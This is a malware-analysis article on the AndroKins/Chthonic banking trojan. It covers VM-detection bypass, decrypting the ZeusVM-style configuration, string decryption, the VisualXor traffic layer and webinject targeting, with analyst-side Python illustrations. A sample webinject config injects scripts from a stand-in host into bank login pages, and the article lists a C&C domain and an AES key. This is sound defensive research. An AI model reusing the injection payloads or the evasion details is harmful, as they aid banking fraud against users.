Androkins, also known as Chthonic (1), is a hybrid malware created by combining two other families, Andromeda (2) and KINS (3), hence the name AndroKins. The former is an HTTP-based bot with anti-reverse-engineering tricks. The latter is a Zeus-based banking trojan, also called ZeusVM because it comes with a small embedded virtual machine that protects and hides the malware's built-in configuration. The result of this merge inherits both properties: it is a malware capable of committing banking fraud and, at the same time, an extremely cumbersome sample for researchers to analyze.

Another interesting aspect of Androkins is its C&C infrastructure: instead of regular top-level domains, .bit addresses are used. These names are registered on the Namecoin (4) blockchain rather than through an ordinary registrar, so they are not served by the public DNS and cannot be seized or suspended at registrar level; the objective is anonymity and resilience for the operator, similar in spirit to Tor.

Bypassing VMware detection

When launching a sample of AndroKins, the first thing we notice is the creation of a new msiexec.exe process. This is a common injection technique, in which malicious code is injected into the image of a legitimate process. Beyond that, nothing else seems to happen: no connection to any remote site is made. Attaching a debugger to msiexec.exe, we soon find that we have entered an infinite loop, which is the malware's default behavior when a sandbox or virtual machine is detected:

Infinite loop — Sandbox detection

From experience, it is not recommended simply to patch the conditional jump shown at address 400a80h, because the function vm_detect also performs some initializations, and without them the malware may not behave as expected. The better approach is to enter the function and step through it carefully, so that the initialization still runs and only the detection result itself is altered.

Getting the malware’s internal configuration

The malware's configuration was encrypted with a polymorphic algorithm before being embedded in the sample. That algorithm was then compiled into a set of custom CPU-like instructions, which are interpreted by the small virtual machine that AndroKins comes with; since the instruction sequence can differ from build to build, there is no fixed decryption routine to reimplement. For someone who has already analyzed ZeusVM it is an easy task to pinpoint the dispatcher routine that executes those instructions one by one:

Virtual Machine dispatcher routine in AndroKins
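To make the dispatcher pattern concrete, here is an added example (my own illustration, not AndroKins or ZeusVM code): a toy bytecode VM whose opcodes, operand encoding, program and configuration string are all invented. It shows the shape of such a dispatcher (fetch opcode, look up the handler, execute), how a builder can emit a different program per build while the interpreter stays the same, and the analyst's shortcut of letting the VM run to its end instruction and dumping the buffer rather than reversing the bytecode by hand.

```python
# Added example, not AndroKins code: a toy bytecode VM with the structure of a
# ZeusVM-style config protector. The opcodes, operand encoding and program below
# are invented for illustration and are NOT the real ZeusVM instruction set.

OP_XOR_IMM = 0x01   # buf[i] ^= imm               (one operand byte)
OP_ADD_IMM = 0x02   # buf[i] = (buf[i] + imm) & 0xff (one operand byte)
OP_ROL     = 0x03   # rotate every byte left by imm bits (one operand byte)
OP_SWAP    = 0x04   # swap buf[a] and buf[b]        (two operand bytes)
OP_END     = 0xFF   # stop; the buffer now holds the plaintext config

OPERAND_COUNT = {OP_XOR_IMM: 1, OP_ADD_IMM: 1, OP_ROL: 1, OP_SWAP: 2}


def _rol8(value, bits):
    bits &= 7
    return ((value << bits) | (value >> (8 - bits))) & 0xFF


def _op_xor(buf, args):
    return bytearray(b ^ args[0] for b in buf)


def _op_add(buf, args):
    return bytearray((b + args[0]) & 0xFF for b in buf)


def _op_rol(buf, args):
    return bytearray(_rol8(b, args[0]) for b in buf)


def _op_swap(buf, args):
    a, b = args
    buf[a], buf[b] = buf[b], buf[a]
    return buf


# The dispatcher table. In a real sample this is the switch / jump table that a
# ZeusVM-experienced analyst looks for: one small handler per opcode.
HANDLERS = {OP_XOR_IMM: _op_xor, OP_ADD_IMM: _op_add, OP_ROL: _op_rol, OP_SWAP: _op_swap}


def run_vm(code, data):
    """Dispatcher loop: fetch opcode, fetch operands, call the handler, repeat."""
    buf, pc = bytearray(data), 0
    while code[pc] != OP_END:
        op = code[pc]
        n = OPERAND_COUNT[op]                  # unknown opcode -> KeyError (crash)
        args = code[pc + 1:pc + 1 + n]
        buf = HANDLERS[op](buf, args)
        pc += 1 + n
    return bytes(buf)


def disassemble(code):
    """Split bytecode into (opcode, operands) tuples."""
    insns, pc = [], 0
    while code[pc] != OP_END:
        op = code[pc]
        n = OPERAND_COUNT[op]
        insns.append((op, tuple(code[pc + 1:pc + 1 + n])))
        pc += 1 + n
    return insns


def inverse_program(code):
    """Builder side: bytecode that undoes `code`, i.e. the encryptor. Each build
    can emit a different random program, which is what makes the protection
    'polymorphic' while the interpreter itself never changes."""
    out = bytearray()
    for op, args in reversed(disassemble(code)):
        if op in (OP_XOR_IMM, OP_SWAP):
            out += bytes([op, *args])                  # self-inverse
        elif op == OP_ADD_IMM:
            out += bytes([op, (-args[0]) & 0xFF])
        elif op == OP_ROL:
            out += bytes([op, (8 - args[0]) & 7])
    out.append(OP_END)
    return bytes(out)


# Constructed plaintext config, echoing the fields recovered on this page.
CONFIG = b"http://letit2.bit/|taver4"
# The (invented) decryptor program shipped inside the sample.
DECRYPTOR = bytes([OP_XOR_IMM, 0x5A, OP_ROL, 3, OP_ADD_IMM, 0x11, OP_SWAP, 0, 1, OP_END])
# What the builder embeds: the config run through the inverse program.
EMBEDDED_BLOB = run_vm(inverse_program(DECRYPTOR), CONFIG)


def dump_config(blob=EMBEDDED_BLOB, decryptor=DECRYPTOR):
    """Analyst's approach: do not reverse the bytecode by hand; let the
    dispatcher run to OP_END and read the buffer it leaves behind."""
    return run_vm(decryptor, blob)


if __name__ == "__main__":
    print(EMBEDDED_BLOB.hex())
    print(dump_config())
```

The same idea carries over to the debugger: set a breakpoint on the dispatcher's exit path (the OP_END case), let it run, and dump the output buffer, instead of reimplementing whatever program this particular build happens to carry.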

Once the VM has run through this subroutine to completion, we can dump the decrypted configuration, which looks like this:

Embedded configuration

From this configuration we can obtain a few important pieces of information:

  • http://letit2.bit/, the C&C server
  • taver4, the name of this botnet. Other botnet names known to us are: bit103, bit110d, craft, gold,
    maza, maza2, metro, moon, seven, star, taver2, taver3, trade, trade2, trade3, trio, wienna
  • DE27CA69A5070F2D9A83CA1933285C76, the AES key used to encrypt and decrypt C&C traffic

As mentioned earlier, .bit is a special TLD that the system's default DNS resolver cannot answer for. To get around this, Androkins carries a list of foreign DNS servers that do resolve .bit names. This list is encrypted, alongside the rest of the strings, with a custom algorithm (not VM-protected):

String decryption routine

By enumerating all indexes from zero up to a high number (255), we can recover every encrypted string in Androkins, including the foreign DNS servers able to resolve .bit addresses. Note that these IP addresses are not malicious in themselves: they are third-party resolvers that happen to serve .bit names, so on their own they make poor indicators of compromise.
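The enumeration step above, as an added example of mine rather than code from the page: the real AndroKins string routine is custom and is not reproduced here, so a constructed stand-in (a per-entry XOR key masked with the entry index) fills in for it, and the table contents, including the resolver IPs (RFC 5737 documentation addresses), are constructed as well. What the example shows is the method: call the decryptor for every index 0..255, discard results that are not clean printable text, and pull out the entries that look like IPv4 addresses.

```python
import re

# Added example, not AndroKins code. The string-decryption routine in the sample
# is custom; the toy scheme below (per-entry XOR key mixed with the entry index)
# is a constructed stand-in so the enumeration loop has something to run over.
# The table contents are constructed too; the IPs are RFC 5737 documentation
# addresses, not the resolvers found in the real sample.


def toy_decrypt(entry: bytes, index: int) -> bytes:
    """Constructed stand-in: first byte carries the key, masked with the index."""
    key = entry[0] ^ (index & 0xFF)
    return bytes(b ^ key for b in entry[1:])


def toy_encrypt(plaintext: bytes, index: int, key: int) -> bytes:
    return bytes([key ^ (index & 0xFF)]) + bytes(b ^ key for b in plaintext)


# Sparse table: most slots are empty, a few hold strings, one holds binary data.
STRING_TABLE = [b""] * 256
for _i, _s in {
    3: b"msiexec.exe",
    17: b"192.0.2.53",           # constructed .bit-capable resolver
    18: b"198.51.100.53",        # constructed .bit-capable resolver
    42: b"letit2.bit",
    99: b"\xde\x27\xca\x69",     # binary blob: must not be mistaken for a string
}.items():
    STRING_TABLE[_i] = toy_encrypt(_s, _i, key=0x7C)

IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")


def dump_all_strings(table, decrypt, max_index=255):
    """Call the decryptor for every index 0..max_index and keep what comes back.
    In a debugger this is the same loop: set the index argument before the
    call, read the returned buffer after it."""
    dumped = {}
    for i in range(max_index + 1):
        entry = table[i] if i < len(table) else b""
        if len(entry) < 2:           # empty slot: nothing to decrypt
            continue
        dumped[i] = decrypt(entry, i)
    return dumped


def printable_strings(dumped):
    """Drop results that are not clean printable ASCII (keys, padding, junk)."""
    return {i: s.decode("ascii") for i, s in dumped.items()
            if s and all(0x20 <= b < 0x7F for b in s)}


def candidate_resolvers(strings):
    """Entries that look like IPv4 addresses: the DNS servers the bot falls
    back to because the system resolver cannot answer for .bit names."""
    return sorted(s for s in strings.values() if IPV4.match(s))


if __name__ == "__main__":
    found = printable_strings(dump_all_strings(STRING_TABLE, toy_decrypt))
    for idx, text in sorted(found.items()):
        print(idx, text)
    print("resolvers:", candidate_resolvers(found))
```

The printable filter matters in practice: indexes that point at keys or padding decode to binary, and a naive loop that treats every result as a string produces a noisy dump.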

Decrypting C&C communication

Requests to the control panel are encrypted with AES and a custom XOR scheme that goes by the name VisualXor (familiar to anyone who has dealt with ZeusVM). The first call to the control panel is a request that includes the list of running processes, the bot ID, the botnet name, the version number, the MD5 of the dropper, RDTSC timestamp counter values and some other values not yet identified:

Encrypted request to the C&C

Decrypted request

Fortunately, the server does not care whether ollydbg.exe is running in your environment, and it responds with additional components that are further encrypted and even compressed through several layers, which can get quite voluminous to work through.
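The VisualXor layer mentioned above, as an added example (my implementation, not code taken from the page or the sample): the routine follows the visual encrypt/decrypt functions in the leaked Zeus 2.x source, which the KINS/ZeusVM lineage inherits. Whether AndroKins applies it before or after AES, and which AES mode the 16-byte key from the configuration is used with, the page does not say; those are left out here rather than guessed. The sample request string is constructed from the field list above and does not reflect the real wire format.

```python
# Added example, not code from the page. The "visual" XOR layer is implemented
# here as in the leaked Zeus 2.x source (Crypt::_visualEncrypt/_visualDecrypt),
# which the KINS/ZeusVM lineage behind AndroKins inherits. It is keyless chained
# XOR, so it is obfuscation, not encryption: the AES layer with the key from the
# config is what actually protects the traffic.


def visual_encrypt(data: bytes) -> bytes:
    buf = bytearray(data)
    for i in range(1, len(buf)):
        buf[i] ^= buf[i - 1]          # XOR with the already-encoded previous byte
    return bytes(buf)


def visual_decrypt(data: bytes) -> bytes:
    buf = bytearray(data)
    for i in range(len(buf) - 1, 0, -1):
        buf[i] ^= buf[i - 1]          # walk backwards so buf[i-1] is still encoded
    return bytes(buf)


def prefix_xor(data: bytes) -> bytes:
    """Equivalent closed form: byte i of the encoded buffer is the XOR of
    plaintext bytes 0..i. Handy for spotting the layer in a hex dump: a run of
    identical plaintext bytes turns into an alternating x,0,x,0,... pattern."""
    out, acc = bytearray(), 0
    for b in data:
        acc ^= b
        out.append(acc)
    return bytes(out)


def looks_visual_encoded(data: bytes) -> bool:
    """Heuristic for finding the layer order once AES has been removed: if
    visual_decrypt raises the share of printable ASCII, the layer was present."""
    def printable_ratio(b):
        return sum(0x20 <= c < 0x7F for c in b) / max(len(b), 1)
    return printable_ratio(visual_decrypt(data)) > printable_ratio(data)


# Constructed stand-in for the decrypted first request; the page lists the
# fields but not the exact format.
SAMPLE_REQUEST = b"bot_id=WIN7-PC_1234&botnet=taver4&ver=1.0.0.0&procs=explorer.exe,ollydbg.exe"


if __name__ == "__main__":
    encoded = visual_encrypt(SAMPLE_REQUEST)
    print(encoded.hex())
    print(looks_visual_encoded(encoded), visual_decrypt(encoded))
```

When decoding captured traffic, the practical question is only where in the stack this layer sits: try AES first and then the visual layer, and the other way round, and keep the order for which looks_visual_encoded reports an improvement.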

Targeted Countries

We have also gathered the webinject configurations of the different botnets. Web injection is a technique in which HTML or JavaScript code is inserted into the infected victim's browsing session when the victim visits one of the targeted websites: the bot matches the visited URL against the filters in its webinject configuration and rewrites the page content before the browser renders it. Based on these filters, Androkins poses the greatest risk to the financial sectors of Italy, Canada, Greece and Turkey.
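How a "most targeted countries" figure is derived from such filters, as an added example of mine (not the page's or the botnet's code): a parser for the Zeus-style webinject format (set_url, data_before, data_inject, data_after, data_end), a tally of targets by the ccTLD of each URL mask, and a matcher that tells which injects would fire for a given request. The sample configuration is constructed, the hostnames are placeholders, and the mask wildcard rules ('*' any run of characters, '#' a single character) follow the Zeus 2 documentation rather than anything recovered from AndroKins.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Added example, not the page's or the botnet's code. Parses Zeus-style
# webinjects and tallies targets by ccTLD. The config below is constructed;
# the hostnames are placeholders.

CC_TLD_TO_COUNTRY = {"it": "Italy", "ca": "Canada", "gr": "Greece", "tr": "Turkey"}

SAMPLE_WEBINJECTS = """\
set_url https://*.example-bank.it/* GP
data_before
<form*name="login"*>
data_end
data_inject
<script src="https://inject.example.net/it.js"></script>
data_end
data_after
data_end

set_url https://online.example-bank.it/login* G
data_inject
<script src="https://inject.example.net/it2.js"></script>
data_end

set_url https://*.example-bank.ca/* GP
data_inject
<script src="https://inject.example.net/ca.js"></script>
data_end

set_url https://*.example-bank.gr/* GP
data_inject
<script src="https://inject.example.net/gr.js"></script>
data_end

set_url https://*.example-bank.tr/* GP
data_inject
<script src="https://inject.example.net/tr.js"></script>
data_end

set_url https://*.example-payments.com/* GP
data_inject
<script src="https://inject.example.net/pay.js"></script>
data_end
"""


def parse_webinjects(text):
    """Parse Zeus-format webinjects into dicts: url mask, flags, three data blocks."""
    injects, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("set_url "):
            _, url, *rest = line.split()
            current = {"url": url, "flags": rest[0] if rest else "",
                       "data_before": [], "data_inject": [], "data_after": []}
            injects.append(current)
            section = None
        elif line in ("data_before", "data_inject", "data_after"):
            section = line
        elif line == "data_end":
            section = None
        elif section and current:
            current[section].append(raw)
    for inj in injects:
        for key in ("data_before", "data_inject", "data_after"):
            inj[key] = "\n".join(inj[key])
    return injects


def mask_to_regex(mask):
    """Zeus URL masks: '*' matches any run of characters, '#' exactly one."""
    parts = (".*" if c == "*" else "." if c == "#" else re.escape(c) for c in mask)
    return re.compile("^" + "".join(parts) + "$", re.IGNORECASE)


def host_of_mask(mask):
    """Host part of a mask without leading wildcards, e.g. 'example-bank.it'."""
    netloc = urlsplit(mask).netloc or mask.split("/")[0]
    return netloc.lstrip("*.")


def country_of_mask(mask):
    tld = host_of_mask(mask).rsplit(".", 1)[-1].lower()
    return CC_TLD_TO_COUNTRY.get(tld, "other/unknown")


def targets_by_country(injects):
    return Counter(country_of_mask(inj["url"]) for inj in injects)


def injects_for_url(injects, url, method="GET"):
    """Injects that would fire for this request (flag G = GET, P = POST)."""
    return [inj for inj in injects
            if method[0].upper() in inj["flags"].upper()
            and mask_to_regex(inj["url"]).match(url)]


if __name__ == "__main__":
    parsed = parse_webinjects(SAMPLE_WEBINJECTS)
    print(targets_by_country(parsed).most_common())
```

Counting by ccTLD is only a first approximation: banks under .com or .net have to be attributed by hand, which is why the tally keeps them in a separate "other/unknown" bucket instead of silently dropping them.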